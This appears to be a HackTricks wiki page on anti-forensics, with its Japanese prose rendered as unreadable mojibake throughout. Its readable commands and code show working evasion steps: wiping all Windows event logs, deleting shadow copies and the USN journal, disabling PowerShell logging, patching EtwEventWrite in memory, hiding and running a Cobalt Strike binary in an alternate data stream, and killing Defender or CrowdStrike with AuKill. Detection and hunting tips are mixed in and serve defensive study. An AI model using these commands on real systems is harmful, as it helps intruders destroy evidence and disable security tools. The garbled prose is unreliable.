ã¢ã³ããã©ã¬ã³ãžãã¯æè¡
Tip
AWSãããã³ã°ãåŠã³ãå®è·µããïŒ
HackTricks Training AWS Red Team Expert (ARTE)
GCPãããã³ã°ãåŠã³ãå®è·µããïŒHackTricks Training GCP Red Team Expert (GRTE)
Azureãããã³ã°ãåŠã³ãå®è·µããïŒ
HackTricks Training Azure Red Team Expert (AzRTE)
HackTricksããµããŒããã
- ãµãã¹ã¯ãªãã·ã§ã³ãã©ã³ã確èªããŠãã ããïŒ
- **ð¬ Discordã°ã«ãŒããŸãã¯ãã¬ã°ã©ã ã°ã«ãŒãã«åå ããããTwitter ðŠ @hacktricks_liveããã©ããŒããŠãã ããã
- HackTricksããã³HackTricks Cloudã®GitHubãªããžããªã«PRãæåºããŠãããã³ã°ããªãã¯ãå ±æããŠãã ããã
ã¿ã€ã ã¹ã¿ã³ã
æ»æè
ã¯ãã¡ã€ã«ã®ã¿ã€ã ã¹ã¿ã³ãã倿Žããããšã«èå³ãæã€ãããããŸããã
ã¿ã€ã ã¹ã¿ã³ãã¯ãMFTå
ã®å±æ§$STANDARD_INFORMATION __ ãš __ $FILE_NAMEã«èŠã€ããããšãã§ããŸãã
äž¡æ¹ã®å±æ§ã«ã¯4ã€ã®ã¿ã€ã ã¹ã¿ã³ãããããŸã: 倿Ž, ã¢ã¯ã»ã¹, äœæ, ããã³ MFTã¬ãžã¹ããªå€æŽ (MACEãŸãã¯MACB)ã
Windowsãšã¯ã¹ãããŒã©ãŒãä»ã®ããŒã«ã¯ã**$STANDARD_INFORMATION**ããã®æ
å ±ã衚瀺ããŸãã
TimeStomp - ã¢ã³ããã©ã¬ã³ãžãã¯ããŒã«
ãã®ããŒã«ã¯**$STANDARD_INFORMATIONå
ã®ã¿ã€ã ã¹ã¿ã³ãæ
å ±ã倿ŽããŸããã$FILE_NAMEå
ã®æ
å ±ã¯å€æŽããŸãã**ããããã£ãŠãçããã æŽ»åãç¹å®ããããšãå¯èœã§ãã
Usnjrnl
USNãžã£ãŒãã« (Update Sequence Number Journal)ã¯ãNTFS (Windows NTãã¡ã€ã«ã·ã¹ãã )ã®æ©èœã§ãããªã¥ãŒã ã®å€æŽã远跡ããŸããUsnJrnl2CsvããŒã«ã䜿çšãããšããããã®å€æŽã調æ»ã§ããŸãã
.png)
åã®ç»åã¯ãããŒã«ã«ãã£ãŠè¡šç€ºãããåºåã§ããã¡ã€ã«ã«å¯ŸããŠããã€ãã®å€æŽãè¡ãããããšã芳å¯ã§ããŸãã
$LogFile
ãã¡ã€ã«ã·ã¹ãã ãžã®ãã¹ãŠã®ã¡ã¿ããŒã¿å€æŽã¯ãæžã蟌ã¿å
è¡ãã°ãšããŠç¥ãããããã»ã¹ã§èšé²ãããŸããèšé²ãããã¡ã¿ããŒã¿ã¯ãNTFSãã¡ã€ã«ã·ã¹ãã ã®ã«ãŒããã£ã¬ã¯ããªã«ãã**$LogFile**ãšããååã®ãã¡ã€ã«ã«ä¿æãããŸããLogFileParserã®ãããªããŒã«ã䜿çšããŠããã®ãã¡ã€ã«ãè§£æãã倿Žãç¹å®ã§ããŸãã
.png)
åã³ãããŒã«ã®åºåã§ã¯ãããã€ãã®å€æŽãè¡ãããããšã確èªã§ããŸãã
åãããŒã«ã䜿çšããŠãã¿ã€ã ã¹ã¿ã³ãã倿Žãããæå»ãç¹å®ããããšãå¯èœã§ãïŒ
.png)
- CTIME: ãã¡ã€ã«ã®äœææå»
- ATIME: ãã¡ã€ã«ã®å€æŽæå»
- MTIME: ãã¡ã€ã«ã®MFTã¬ãžã¹ããªå€æŽ
- RTIME: ãã¡ã€ã«ã®ã¢ã¯ã»ã¹æå»
$STANDARD_INFORMATION ãš $FILE_NAME ã®æ¯èŒ
çããã倿Žããããã¡ã€ã«ãç¹å®ããå¥ã®æ¹æ³ã¯ãäž¡æ¹ã®å±æ§ã®æéãæ¯èŒããŠäžäžèŽãæ¢ãããšã§ãã
ããç§
NTFSã®ã¿ã€ã ã¹ã¿ã³ãã¯100ããç§ã®ç²ŸåºŠãæã£ãŠããŸãããããã£ãŠã2010-10-10 10:10:00.000:0000ã®ãããªã¿ã€ã ã¹ã¿ã³ããæã€ãã¡ã€ã«ãèŠã€ããããšã¯éåžžã«çããã**ã§ãã
SetMace - ã¢ã³ããã©ã¬ã³ãžãã¯ããŒã«
ãã®ããŒã«ã¯ãäž¡æ¹ã®å±æ§$STARNDAR_INFORMATIONãš$FILE_NAMEã倿Žã§ããŸãããã ããWindows Vista以éã¯ãã©ã€ãOSã§ãã®æ
å ±ã倿Žããå¿
èŠããããŸãã
ããŒã¿é èœ
NFTSã¯ã¯ã©ã¹ã¿ãŒãšæå°æ å ±ãµã€ãºã䜿çšããŸããã€ãŸãããã¡ã€ã«ãã¯ã©ã¹ã¿ãŒãšååãå æããŠããå Žåãæ®ãã®ååã¯ãã¡ã€ã«ãåé€ããããŸã§äœ¿çšãããŸããããããã£ãŠããã®ã¹ã©ãã¯ã¹ããŒã¹ã«ããŒã¿ãé ãããšãå¯èœã§ãã
slackerã®ãããªããŒã«ã䜿çšãããšããã®ãé ããããã¹ããŒã¹ã«ããŒã¿ãé ãããšãã§ããŸãããã ãã$logfileã$usnjrnlã®åæã«ãããããã€ãã®ããŒã¿ã远å ãããããšã瀺ãããå¯èœæ§ããããŸãïŒ
.png)
ãã®åŸãFTK Imagerã®ãããªããŒã«ã䜿çšããŠã¹ã©ãã¯ã¹ããŒã¹ãååŸããããšãå¯èœã§ãããã®çš®ã®ããŒã«ã¯ãå 容ãé£èªåãŸãã¯æå·åããŠä¿åããããšãã§ããŸãã
UsbKill
ããã¯ãUSBããŒãã«å€æŽãæ€åºãããå Žåã«ã³ã³ãã¥ãŒã¿ãã·ã£ããããŠã³ããããŒã«ã§ãã
ãããçºèŠããæ¹æ³ã¯ãå®è¡äžã®ããã»ã¹ãæ€æ»ããå®è¡äžã®åPythonã¹ã¯ãªãããã¬ãã¥ãŒããããšã§ãã
ã©ã€ãLinuxãã£ã¹ããªãã¥ãŒã·ã§ã³
ãããã®ãã£ã¹ããªãã¥ãŒã·ã§ã³ã¯RAMã¡ã¢ãªå ã§å®è¡ãããŸããæ€åºããå¯äžã®æ¹æ³ã¯ãNTFSãã¡ã€ã«ã·ã¹ãã ãæžãèŸŒã¿æš©éã§ããŠã³ããããŠããå Žåã§ããèªã¿åãæš©éã®ã¿ã§ããŠã³ããããŠããå ŽåãäŸµå ¥ãæ€åºããããšã¯ã§ããŸããã
ã»ãã¥ã¢åé€
https://github.com/Claudio-C/awesome-data-sanitization
Windowsèšå®
ãã©ã¬ã³ãžãã¯èª¿æ»ãã¯ããã«å°é£ã«ããããã«ãããã€ãã®Windowsãã°èšé²æ¹æ³ãç¡å¹ã«ããããšãå¯èœã§ãã
ã¿ã€ã ã¹ã¿ã³ãã®ç¡å¹å - UserAssist
ããã¯ããŠãŒã¶ãŒã«ãã£ãŠåå®è¡å¯èœãã¡ã€ã«ãå®è¡ãããæ¥æãä¿æããã¬ãžã¹ããªããŒã§ãã
UserAssistãç¡å¹ã«ããã«ã¯ã2ã€ã®ã¹ããããå¿ èŠã§ãïŒ
- 2ã€ã®ã¬ãžã¹ããªããŒã
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_TrackProgsãšHKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_TrackEnabledããŒãã«èšå®ããŠãUserAssistãç¡å¹ã«ãããããšã瀺ããŸãã HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\<hash>ã®ãããªã¬ãžã¹ããªãµãããªãŒãã¯ãªã¢ããŸãã
ã¿ã€ã ã¹ã¿ã³ãã®ç¡å¹å - Prefetch
ããã¯ãWindowsã·ã¹ãã ã®ããã©ãŒãã³ã¹ãåäžãããç®çã§å®è¡ãããã¢ããªã±ãŒã·ã§ã³ã«é¢ããæ å ±ãä¿åããŸãããã ããããã¯ãã©ã¬ã³ãžãã¯å®è·µã«ã圹ç«ã¡ãŸãã
regeditãå®è¡- ãã¡ã€ã«ãã¹
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SessionManager\Memory Management\PrefetchParametersãéžæ EnablePrefetcherãšEnableSuperfetchã®äž¡æ¹ãå³ã¯ãªãã¯- åã ã®å€ã1ïŒãŸãã¯3ïŒãã0ã«å€æŽããããã«ä¿®æ£ãéžæ
- åèµ·å
ã¿ã€ã ã¹ã¿ã³ãã®ç¡å¹å - æçµã¢ã¯ã»ã¹æå»
NTFSããªã¥ãŒã ãããã©ã«ããŒãéããããã³ã«ãã·ã¹ãã ã¯åãªã¹ãããããã©ã«ããŒã®ã¿ã€ã ã¹ã¿ã³ããã£ãŒã«ããæŽæ°ããããã®æéãåããŸããããã¯ãæçµã¢ã¯ã»ã¹æå»ãšåŒã°ããŸããNTFSããªã¥ãŒã ãé »ç¹ã«äœ¿çšãããå Žåããããããã©ãŒãã³ã¹ã«åœ±é¿ãäžããå¯èœæ§ããããŸãã
- ã¬ãžã¹ããªãšãã£ã¿ãéã (Regedit.exe)ã
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\FileSystemã«ç§»åããŸããNtfsDisableLastAccessUpdateãæ¢ããŸããååšããªãå Žåã¯ããã®DWORDã远å ãããã®å€ã1ã«èšå®ããŠããã»ã¹ãç¡å¹ã«ããŸãã- ã¬ãžã¹ããªãšãã£ã¿ãéãããµãŒããŒãåèµ·åããŸãã
USBå±¥æŽã®åé€
ãã¹ãŠã®USBããã€ã¹ãšã³ããªã¯ãPCãŸãã¯ã©ãããããã«USBããã€ã¹ãæ¥ç¶ãããã³ã«äœæããããµãããŒãå«ãUSBSTORã¬ãžã¹ããªããŒã®äžã«Windowsã¬ãžã¹ããªã«ä¿åãããŸãããã®ããŒã¯ããã«ãããŸãHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\USBSTORããããåé€ããããšã§ãUSBå±¥æŽãåé€ããŸãã
ãŸããUSBDeviewããŒã«ã䜿çšããŠãåé€ããããšã確èªããããšãã§ããŸãïŒããã³åé€ããããã«ïŒã
USBã«é¢ããæ
å ±ãä¿åããå¥ã®ãã¡ã€ã«ã¯ãC:\Windows\INFå
ã®setupapi.dev.logãã¡ã€ã«ã§ãããããåé€ããå¿
èŠããããŸãã
ã·ã£ããŠã³ããŒã®ç¡å¹å
ã·ã£ããŠã³ããŒããªã¹ãããã«ã¯vssadmin list shadowstorage
åé€ããã«ã¯vssadmin delete shadowãå®è¡ããŸãã
GUIãä»ããŠåé€ããããšãå¯èœã§ãhttps://www.ubackup.com/windows-10/how-to-delete-shadow-copies-windows-10-5740.htmlã§ææ¡ãããæé ã«åŸããŸãã
ã·ã£ããŠã³ããŒãç¡å¹ã«ããã«ã¯ããã¡ãã®æé ãåç §ããŠãã ããïŒ
- Windowsã¹ã¿ãŒããã¿ã³ãã¯ãªãã¯ããåŸãããã¹ãæ€çŽ¢ããã¯ã¹ã«ãservicesããšå ¥åããŠãµãŒãã¹ããã°ã©ã ãéããŸãã
- ãªã¹ããããVolume Shadow CopyããèŠã€ããŠéžæããå³ã¯ãªãã¯ããŠããããã£ã«ã¢ã¯ã»ã¹ããŸãã
- ãã¹ã¿ãŒãã¢ããã®çš®é¡ãããããããŠã³ã¡ãã¥ãŒãããç¡å¹ããéžæãã倿Žã確èªããããã«ãé©çšããšãOKããã¯ãªãã¯ããŸãã
ã·ã£ããŠã³ããŒã§ã³ããŒããããã¡ã€ã«ã®æ§æã倿Žããããšãå¯èœã§ãã¬ãžã¹ããªHKLM\SYSTEM\CurrentControlSet\Control\BackupRestore\FilesNotToSnapshotã§èšå®ã§ããŸãã
åé€ããããã¡ã€ã«ã®äžæžã
- WindowsããŒã«ã䜿çšã§ããŸãïŒ
cipher /w:Cããã¯ãCãã©ã€ãå ã®æªäœ¿çšã®ãã£ã¹ã¯ã¹ããŒã¹ããããŒã¿ãåé€ããããã«cipherã«æç€ºããŸãã - Eraserã®ãããªããŒã«ã䜿çšããããšãã§ããŸãã
Windowsã€ãã³ããã°ã®åé€
- Windows + R â> eventvwr.msc â> âWindows Logsâãå±é â> åã«ããŽãªãå³ã¯ãªãã¯ããŠããã°ã®ã¯ãªã¢ããéžæ
for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }
Windowsã€ãã³ããã°ã®ç¡å¹å
reg add 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\eventlog' /v Start /t REG_DWORD /d 4 /f- ãµãŒãã¹ã»ã¯ã·ã§ã³å ã§ãWindows Event LogããµãŒãã¹ãç¡å¹ã«ããŸãã
WEvtUtil.exec clear-logãŸãã¯WEvtUtil.exe cl
$UsnJrnlã®ç¡å¹å
fsutil usn deletejournal /d c:
é«åºŠãªãã°èšé²ãšãã¬ãŒã¹æ¹ãã (2023-2025)
PowerShell ScriptBlock/Module Logging
æè¿ã®Windows 10/11ããã³Windows Serverã®ããŒãžã§ã³ã¯ãMicrosoft-Windows-PowerShell/Operational (ã€ãã³ã4104/4105/4106)ã®äžã«è±å¯ãªPowerShellãã©ã¬ã³ãžãã¯ã¢ãŒãã£ãã¡ã¯ããä¿æããŸããæ»æè
ã¯ããããããªã³ã¶ãã©ã€ã§ç¡å¹ã«ãããæ¶å»ãããããããšãã§ããŸãïŒ
# Turn OFF ScriptBlock & Module logging (registry persistence)
New-ItemProperty -Path "HKLM:\\SOFTWARE\\Microsoft\\PowerShell\\3\\PowerShellEngine" \
-Name EnableScriptBlockLogging -Value 0 -PropertyType DWord -Force
New-ItemProperty -Path "HKLM:\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ModuleLogging" \
-Name EnableModuleLogging -Value 0 -PropertyType DWord -Force
# In-memory wipe of recent PowerShell logs
Get-WinEvent -LogName 'Microsoft-Windows-PowerShell/Operational' |
Remove-WinEvent # requires admin & Win11 23H2+
é²åŸ¡è ã¯ããããã®ã¬ãžã¹ããªããŒã®å€æŽãšå€§éã®PowerShellã€ãã³ãã®åé€ãç£èŠããã¹ãã§ãã
ETW (Event Tracing for Windows) ããã
ãšã³ããã€ã³ãã»ãã¥ãªãã£è£œåã¯ETWã«å€§ããäŸåããŠããŸãã2024幎ã®äººæ°ã®åé¿æ¹æ³ã¯ãã¡ã¢ãªå
ã§ntdll!EtwEventWrite/EtwEventWriteFullããããããŠããã¹ãŠã®ETWåŒã³åºããã€ãã³ããçºçãããããšãªãSTATUS_SUCCESSãè¿ãããã«ããããšã§ãã
// 0xC3 = RET on x64
unsigned char patch[1] = { 0xC3 };
WriteProcessMemory(GetCurrentProcess(),
GetProcAddress(GetModuleHandleA("ntdll.dll"), "EtwEventWrite"),
patch, sizeof(patch), NULL);
Public PoCs (e.g. EtwTiSwallow) ã¯ãPowerShell ãŸã㯠C++ ã§åãããªããã£ããå®è£
ããŠããŸãã
ãããã ããã»ã¹ããŒã«ã« ã§ãããããä»ã®ããã»ã¹å
ã§å®è¡ãããŠãã EDR ã¯ãããèŠéãå¯èœæ§ããããŸãã
æ€åº: ã¡ã¢ãªå
ã® ntdll ãšãã£ã¹ã¯äžã® ntdll ãæ¯èŒãããããŠãŒã¶ãŒã¢ãŒãã®åã«ããã¯ããŸãã
Alternate Data Streams (ADS) 埩掻
2023幎ã®ãã«ãŠã§ã¢ãã£ã³ããŒã³ïŒäŸ: FIN12 ããŒããŒïŒã§ã¯ãåŸæ¥ã®ã¹ãã£ããŒã®èŠçããå€ããããã«ãADS å ã«ç¬¬äºæ®µéã®ãã€ããªãã¹ããŒãžã³ã°ããŠããã®ã確èªãããŠããŸã:
rem Hide cobalt.bin inside an ADS of a PDF
type cobalt.bin > report.pdf:win32res.dll
rem Execute directly
wmic process call create "cmd /c report.pdf:win32res.dll"
ã¹ããªãŒã ãåæããã«ã¯ãdir /RãGet-Item -Stream *ããŸãã¯Sysinternalsã®streams64.exeã䜿çšããŸãããã¹ããã¡ã€ã«ãFAT/exFATã«ã³ããŒããããSMBçµç±ã§ã³ããŒãããšãé ãã¹ããªãŒã ãåé€ããã調æ»è
ããã€ããŒããå埩ããããã«äœ¿çšã§ããŸãã
BYOVD & âAuKillâ (2023)
Bring-Your-Own-Vulnerable-Driverã¯ãã©ã³ãµã ãŠã§ã¢äŸµå
¥ã«ãããã¢ã³ããã©ã¬ã³ãžãã¯ã«æ¥åžžçã«äœ¿çšãããŠããŸãããªãŒãã³ãœãŒã¹ããŒã«AuKillã¯ã眲åããããè匱ãªãã©ã€ããŒïŒprocexp152.sysïŒãããŒãããŠãæå·åããã³ãã°ç Žå£ã®åã«EDRããã³ãã©ã¬ã³ãžãã¯ã»ã³ãµãŒãäžæåæ¢ãŸãã¯çµäºãããŸãã
AuKill.exe -e "C:\\Program Files\\Windows Defender\\MsMpEng.exe"
AuKill.exe -k CrowdStrike
ãã©ã€ããŒã¯ãã®åŸåé€ãããæå°éã®ã¢ãŒãã£ãã¡ã¯ããæ®ããŸãã
ç·©åçïŒMicrosoftã®è匱ãªãã©ã€ããŒãããã¯ãªã¹ãïŒHVCI/SACïŒãæå¹ã«ãããŠãŒã¶ãŒãæžã蟌ã¿å¯èœãªãã¹ããã®ã«ãŒãã«ãµãŒãã¹ã®äœæãèŠåããŸãã
Linuxã¢ã³ããã©ã¬ã³ãžãã¯ã¹ïŒèªå·±ããããšã¯ã©ãŠãC2ïŒ2023â2025ïŒ
æ€åºãæžããããã«åŠ¥åããããµãŒãã¹ãèªå·±ãããããïŒLinuxïŒ
æµå¯Ÿè ã¯ãåå©çšãé²ããè匱æ§ã«åºã¥ãæ€åºãæå¶ããããã«ããµãŒãã¹ãæªçšããçŽåŸã«ãèªå·±ãããããè¡ãããšãå¢ããŠããŸããã¢ã€ãã¢ã¯ãè匱ãªã³ã³ããŒãã³ããææ°ã®æ£åœãªã¢ããã¹ããªãŒã ãã€ããª/JARã«çœ®ãæããããšã§ãã¹ãã£ããŒããã¹ãããããæžã¿ãšããŠå ±åãã€ã€ãæç¶æ§ãšC2ãç¶æããããšã§ãã
äŸïŒApache ActiveMQ OpenWire RCEïŒCVEâ2023â46604ïŒ
- ãã¹ããšã¯ã¹ããã€ãåŸãæ»æè ã¯Maven CentralïŒrepo1.maven.orgïŒããæ£åœãªJARãååŸããActiveMQã€ã³ã¹ããŒã«å ã®è匱ãªJARãåé€ãããããŒã«ãŒãåèµ·åããŸããã
- ããã«ãããåæã®RCEã¯éããããŸããããä»ã®è¶³å ŽïŒcronãSSHèšå®ã®å€æŽãå¥ã®C2ã€ã³ãã©ã³ãïŒã¯ç¶æãããŸããã
éçšäŸïŒäŸç€ºçïŒ
# ActiveMQ install root (adjust as needed)
AMQ_DIR=/opt/activemq
cd "$AMQ_DIR"/lib
# Fetch patched JARs from Maven Central (versions as appropriate)
curl -fsSL -O https://repo1.maven.org/maven2/org/apache/activemq/activemq-client/5.18.3/activemq-client-5.18.3.jar
curl -fsSL -O https://repo1.maven.org/maven2/org/apache/activemq/activemq-openwire-legacy/5.18.3/activemq-openwire-legacy-5.18.3.jar
# Remove vulnerable files and ensure the service uses the patched ones
rm -f activemq-client-5.18.2.jar activemq-openwire-legacy-5.18.2.jar || true
ln -sf activemq-client-5.18.3.jar activemq-client.jar
ln -sf activemq-openwire-legacy-5.18.3.jar activemq-openwire-legacy.jar
# Apply changes without removing persistence
systemctl restart activemq || service activemq restart
Forensic/hunting tips
- ãµãŒãã¹ãã£ã¬ã¯ããªã確èªããŠãã¹ã±ãžã¥ãŒã«ãããŠããªããã€ããª/JARã®çœ®ãæããæ¢ããŸãïŒ
- Debian/Ubuntu:
dpkg -V activemqãå®è¡ãããã¡ã€ã«ã®ããã·ã¥/ãã¹ããªããžããªãã©ãŒãšæ¯èŒããŸãã - RHEL/CentOS:
rpm -Va 'activemq*' - ããã±ãŒãžãããŒãžã£ãŒã«ææãããŠããªããã£ã¹ã¯äžã®JARããŒãžã§ã³ãããã³ãå€ã§æŽæ°ãããã·ã³ããªãã¯ãªã³ã¯ãæ¢ããŸãã
- ã¿ã€ã ã©ã€ã³:
find "$AMQ_DIR" -type f -printf '%TY-%Tm-%Td %TH:%TM %p\n' | sortã䜿çšããŠãctime/mtimeã䟵害ãŠã£ã³ããŠãšçžé¢ãããŸãã - ã·ã§ã«å±¥æŽ/ããã»ã¹ãã¬ã¡ããª: åæã®æªçšçŽåŸã«
curl/wgetãrepo1.maven.orgãŸãã¯ä»ã®ã¢ãŒãã£ãã¡ã¯ãCDNã«å¯ŸããŠäœ¿çšãã蚌æ ã - 倿Žç®¡ç: âãããâãé©çšããã®ã¯èª°ã§ããªãé©çšãããã®ããæ€èšŒãããããããŒãžã§ã³ãååšããã ãã§ã¯äžååã§ãã
Cloudâservice C2 with bearer tokens and antiâanalysis stagers
芳å¯ããããã¬ãŒãã¯ã©ããã¯ãè€æ°ã®é·è·é¢C2ãã¹ãšã¢ã³ãåæããã±ãŒãžã³ã°ãçµã¿åãããŠããŸããïŒ
- ãµã³ãããã¯ã¹åãéçåæã劚ããããã®ãã¹ã¯ãŒãä¿è·ãããPyInstaller ELFããŒããŒïŒäŸïŒæå·åãããPYZã
/_MEI*ã®äžã§ã®äžæçãªæœåºïŒã - ã€ã³ãžã±ãŒã¿ãŒ:
stringsãããã®äŸãšããŠPyInstaller,pyi-archive,PYZ-00.pyz,MEIPASSã - ã©ã³ã¿ã€ã ã¢ãŒãã£ãã¡ã¯ã:
/tmp/_MEI*ãžã®æœåºãŸãã¯ã«ã¹ã¿ã--runtime-tmpdirãã¹ã - ããŒãã³ãŒãã£ã³ã°ãããOAuthãã¢ã©ãŒããŒã¯ã³ã䜿çšããDropboxããã¯ã¢ããC2ã
- ãããã¯ãŒã¯ããŒã«ãŒ:
api.dropboxapi.com/content.dropboxapi.comã§Authorization: Bearer <token>ã - éåžžãã¡ã€ã«ãåæããªããµãŒããŒã¯ãŒã¯ããŒãããDropboxãã¡ã€ã³ãžã®ã¢ãŠãããŠã³ãHTTPSãæ¢ãããã«ããããã·/NetFlow/Zeek/Suricataã§ãã³ãããŸãã
- ãã³ããªã³ã°ãä»ãã䞊è¡/ããã¯ã¢ããC2ïŒäŸïŒCloudflare Tunnel
cloudflaredïŒã1ã€ã®ãã£ãã«ããããã¯ãããå Žåã§ãå¶åŸ¡ãç¶æããŸãã - ãã¹ãIOC:
cloudflaredããã»ã¹/ãŠãããã~/.cloudflared/*.jsonã®èšå®ãCloudflareãšããžãžã®ã¢ãŠãããŠã³ã443ã
Persistence and âhardening rollbackâ to maintain access (Linux examples)
æ»æè ã¯èªå·±ããããšèä¹ æ§ã®ããã¢ã¯ã»ã¹ãã¹ãé »ç¹ã«çµã¿åãããŸãïŒ
- Cron/Anacron: å
/etc/cron.*/ãã£ã¬ã¯ããªå ã®0anacronã¹ã¿ãã®ç·šéã«ãã宿çãªå®è¡ã - ãã³ã:
for d in /etc/cron.*; do [ -f "$d/0anacron" ] && stat -c '%n %y %s' "$d/0anacron"; done
grep -R --line-number -E 'curl|wget|python|/bin/sh' /etc/cron.*/* 2>/dev/null
- SSHèšå®ã®ããŒããã³ã°ããŒã«ããã¯: ã«ãŒããã°ã€ã³ãæå¹ã«ããäœç¹æš©ã¢ã«ãŠã³ãã®ããã©ã«ãã·ã§ã«ã倿ŽããŸãã
- ã«ãŒããã°ã€ã³ã®æå¹åããã³ã:
grep -E '^\s*PermitRootLogin' /etc/ssh/sshd_config
# "yes" ãé床ã«èš±å¯ãããèšå®ã®ãããªãã©ã°å€
- ã·ã¹ãã ã¢ã«ãŠã³ãïŒäŸïŒ
gamesïŒã§ã®çãããã€ã³ã¿ã©ã¯ãã£ãã·ã§ã«ããã³ã:
awk -F: '($7 ~ /bin\/(sh|bash|zsh)/ && $1 ~ /^(games|lp|sync|shutdown|halt|mail|operator)$/) {print}' /etc/passwd
- ã¯ã©ãŠãC2ã«ãæ¥ç¶ããã©ã³ãã ã§çãååã®ããŒã³ã³ã¢ãŒãã£ãã¡ã¯ãïŒ8æåã®ã¢ã«ãã¡ãããïŒããã£ã¹ã¯ã«ããããããŸãïŒ
- ãã³ã:
find / -maxdepth 3 -type f -regextype posix-extended -regex '.*/[A-Za-z]{8}$' \
-exec stat -c '%n %s %y' {} \; 2>/dev/null | sort
é²åŸ¡è ã¯ããããã®ã¢ãŒãã£ãã¡ã¯ããå€éšé²åºããã³ãµãŒãã¹ãããã€ãã³ããšçžé¢ãããŠãåæã®æªçšãé ãããã«äœ¿çšãããã¢ã³ããã©ã¬ã³ãžãã¯èªå·±ä¿®åŸ©ãæããã«ããå¿ èŠããããŸãã
References
-
Sophos X-Ops â âAuKill: A Weaponized Vulnerable Driver for Disabling EDRâ (March 2023) https://news.sophos.com/en-us/2023/03/07/aukill-a-weaponized-vulnerable-driver-for-disabling-edr
-
Red Canary â âPatching EtwEventWrite for Stealth: Detection & Huntingâ (June 2024) https://redcanary.com/blog/etw-patching-detection
-
Red Canary â Patching for persistence: How DripDropper Linux malware moves through the cloud
Tip
AWSãããã³ã°ãåŠã³ãå®è·µããïŒ
HackTricks Training AWS Red Team Expert (ARTE)
GCPãããã³ã°ãåŠã³ãå®è·µããïŒHackTricks Training GCP Red Team Expert (GRTE)
Azureãããã³ã°ãåŠã³ãå®è·µããïŒ
HackTricks Training Azure Red Team Expert (AzRTE)
HackTricksããµããŒããã
- ãµãã¹ã¯ãªãã·ã§ã³ãã©ã³ã確èªããŠãã ããïŒ
- **ð¬ Discordã°ã«ãŒããŸãã¯ãã¬ã°ã©ã ã°ã«ãŒãã«åå ããããTwitter ðŠ @hacktricks_liveããã©ããŒããŠãã ããã
- HackTricksããã³HackTricks Cloudã®GitHubãªããžããªã«PRãæåºããŠãããã³ã°ããªãã¯ãå ±æããŠãã ããã


